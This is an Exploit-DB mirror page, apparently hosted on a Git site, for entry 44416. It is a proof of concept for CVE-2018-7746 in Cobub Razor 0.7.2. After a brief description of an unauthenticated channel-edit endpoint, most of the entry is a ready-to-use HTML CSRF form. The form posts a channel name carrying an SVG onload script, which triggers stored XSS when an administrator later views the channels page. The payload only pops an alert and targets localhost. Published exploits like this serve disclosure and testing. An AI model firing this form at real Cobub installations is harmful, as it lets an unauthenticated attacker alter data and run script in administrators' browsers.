bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44416.txt
Offensive Security 4088e4151b DB: 2018-04-07 
6 changes to exploits/shellcodes

Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass
Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption

LineageOS 14.1 Blueborne - Remote Code Execution
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass
DotNetNuke DNNarticle Module 11 - Directory Traversal
Cobub Razor 0.7.2 - Cross Site Request Forgery
2018-04-07 05:01:44 +00:00

22 lines
No EOL
972 B
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery]
# Date: [2018-03-07]
# Exploit Author: [ppbppb@5ecurity.cn]
# Vendor Homepage: [https://github.com/cobub/razor/]
# Software Link: [https://github.com/cobub/razor/]
# Version: [0.72]
# CVE : [CVE-2018-7746]
There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
<input type="hidden" name="channel_id" value="979" />
<input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
<input type="hidden" name="platform" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink